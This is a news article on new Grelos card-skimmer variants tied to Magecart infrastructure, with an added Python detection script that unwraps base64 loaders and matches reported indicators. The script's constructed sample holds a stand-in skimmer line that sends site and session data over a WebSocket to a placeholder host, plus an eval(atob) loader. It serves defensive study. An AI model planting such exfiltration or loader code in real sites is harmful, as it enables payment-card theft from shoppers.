Just as seasonal online shopping kicks into high gear, new variants of the point-of-sale Grelos skimmer malware have been identified. Variants are targeting the payment-card data of online retail shoppers on dozens of compromised websites, researchers warn.
The Grelos skimmer malware has been around since 2015, and its original version is associated with what are called Groups 1 and 2 under the prolific Magecart umbrella of loosely organized cybercriminals. However, over time new actors began to co-opt the Grelos skimmer and reuse some of the original domains used to host the malware. The result, researchers say, is a unique overlap between the infrastructure behind the most recent Grelos variants and that used by Magecart.
In a new analysis, researchers said that a cookie found on a compromised website led to the discovery of Grelos – and they were then able to link new variants to it because they shared infrastructure and had identical WHOIS records (WHOIS is the query-and-response protocol widely used to look up domain-registration data).
“Recently, a unique cookie allowed RiskIQ researchers to connect a recent variant of this skimmer to an even newer version that uses a fake payment form to steal payment data from victims,” said researchers with RiskIQ in an analysis this week. “Domains related to this cookie have compromised dozens of sites so far.”
The Skimmer Variant
The new variants of the skimmer first appeared when researcher Affable Kraut documented one via Twitter in July 2020. This version of the skimmer features a loader stage and a skimmer stage, both of which are base64-encoded five times over, said researchers.
The Grelos variant discovered by Kraut also used WebSockets for skimming. The WebSocket API is a technology that makes it possible to open a two-way interactive communication session between a web browser and a server. The use of a WebSocket connection to exfiltrate sensitive data is not new and was first observed in connection with a Magecart Group 9 skimmer in December 2019.
Then in a separate incident, researchers investigated the threat group Full(z) House’s recent compromise of Boom!Mobile in October. During their investigation, researchers noticed a unique cookie, which was connected to three additional skimming domains and several victim domains.
These skimming domains, which included facebookapimanager[.]com and googleapimanager[.]com, contained a more recent variant of the Grelos skimmer. Researchers said the connection between the cookie and the skimmer domains piqued their interest because skimmer domains sharing an identical cookie is not common.
“These four domains have been hosted on several different IPs, but most often they used infrastructure belonging to ASN 45102 – Hangzhou Alibaba Advertising Co.,Ltd., a hosting provider that is currently popular with several different Magecart actors,” said researchers.
This skimmer has a base64-encoded loader stage similar to the one documented by Kraut, except that this loader is wrapped in only one layer of encoding, with an unencoded duplicate of the encoded script tag below it, said researchers.
The skimmer code included a “translate” function with various phrases used by the fake HTML payment form that it creates after it compromises a website. These phrases include “Pay with credit or debit card,” “Check the cardholder first name,” “We can not process your payment,” and others.
When a shopper visits a compromised website, they are presented with the fake payment form containing these phrases. When they submit their payment-card information, that data is exfiltrated by the skimmer via a function that stringifies the stolen data along with the site_id, sid, and ip (this function also features an interesting grammatical mistake, researchers noted, using the word “sended” rather than “sent”).
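The traits the article attributes to both Grelos variants (a loader wrapped in one or more layers of base64, an unencoded duplicate of the same script, WebSocket use, the fake-form phrases, the site_id/sid/ip exfiltration fields and the “sended” typo) can be turned into a simple content check that a site owner can run against their own pages. The following Python is an added example written for this article, not RiskIQ's tooling or any real skimmer code: it peels nested base64 layers off string literals found in inline scripts and then looks for those indicators in the decoded text. The sample HTML, the stand-in inner script, the host skimmer.invalid and the address 203.0.113.5 are all constructed for the example.

```python
import base64
import binascii
import re

# Constructed stand-in for a decoded skimmer body. It only carries the indicators
# named in the article; it captures nothing and is not functional skimmer code.
INNER_SCRIPT = (
    'var t = {"pay": "Pay with credit or debit card"};'
    'var s = new WebSocket("wss://skimmer.invalid/socket");'  # hypothetical host
    'var d = {site_id: 1, sid: "abc", ip: "203.0.113.5", sended: true};'
    's.send(JSON.stringify(d));'
)

# Indicators taken from the article's description of the two variants.
INDICATORS = {
    "websocket": re.compile(r"new\s+WebSocket\s*\(", re.I),
    "fake_form_phrase": re.compile(
        r"Pay with credit or debit card|Check the cardholder first name"
        r"|We can not process your payment"),
    "exfil_fields": re.compile(r"site_id|\bsid\b"),
    "sended_typo": re.compile(r"\bsended\b"),
}

# Long runs of base64 alphabet inside a script: candidates for a wrapped loader.
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
SCRIPT_RX = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)


def wrap_base64(text, layers):
    """Base64-encode `text` `layers` times. Used only to build the sample input."""
    data = text.encode()
    for _ in range(layers):
        data = base64.b64encode(data)
    return data.decode()


def unwrap_base64(blob, max_layers=8):
    """Strip up to max_layers of base64 from blob; return (text, layers_removed).

    Decoding stops as soon as a layer is not valid base64 or not valid UTF-8,
    so plain JavaScript (spaces, braces, quotes) is returned untouched.
    """
    current = blob
    layers = 0
    while layers < max_layers:
        candidate = re.sub(r"\s+", "", current)
        if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", candidate):
            break
        try:
            decoded = base64.b64decode(candidate, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            break
        current = decoded
        layers += 1
    return current, layers


def scan_script(script_text, max_layers=8):
    """Expand base64 literals in one script body and report indicator hits."""
    deepest = 0

    def _expand(match):
        nonlocal deepest
        text, layers = unwrap_base64(match.group(0), max_layers)
        deepest = max(deepest, layers)
        return text

    expanded = B64_LITERAL.sub(_expand, script_text)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(expanded))
    # Heuristic: two or more independent indicators in one script is worth a look.
    return {"layers": deepest, "indicators": hits, "suspicious": len(hits) >= 2}


def scan_html(html, max_layers=8):
    """Run scan_script over every inline <script> body in the page."""
    return [scan_script(body, max_layers) for body in SCRIPT_RX.findall(html)]


# Constructed page: a benign script, a one-layer loader like the newer variant,
# and the unencoded duplicate of the same script that the article describes.
ONE_LAYER = wrap_base64(INNER_SCRIPT, 1)
SAMPLE_HTML = (
    "<html><body>"
    "<script>document.title = 'Shop';</script>"
    f"<script>eval(atob('{ONE_LAYER}'));</script>"
    f"<script>{INNER_SCRIPT}</script>"
    "</body></html>"
)

if __name__ == "__main__":
    for i, result in enumerate(scan_html(SAMPLE_HTML)):
        print(f"script {i}: {result}")
```

The five-layer wrapping of the July 2020 variant is handled by the same loop: unwrap_base64 keeps decoding while each layer is still valid base64 and stops at the first layer that is ordinary script text. The indicator set is deliberately narrow and tied to the strings reported for these variants, so a hit means “this matches the reported Grelos traits,” not a general verdict on a page.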
Researchers recently reported that they have seen an uptick in the number of e-commerce sites being attacked by Magecart and related groups, dovetailing with new tactics. Typically, Magecart actors plant web skimmers on websites either by exploiting a vulnerability in the website’s e-commerce platform, by gaining access to the victim’s network via phishing or other means, or by other tactics (it’s unclear what tactics the threat actors are using to compromise websites with the Grelos skimmer).
In October, one of the largest known Magecart campaigns to date took place, with nearly 2,000 e-commerce sites hacked in an automated campaign that may be linked to a zero-day exploit. Earlier in September, Magecart was seen using the secure messaging service Telegram as a data-exfiltration mechanism.
Researchers with RiskIQ, for their part, said they expect overlaps in the infrastructure used to host various skimmers, as well as the reuse of skimmer code, to increase in the future.
“This complex overlap illustrates the increasingly muddy waters for researchers tracking Magecart,” they warned.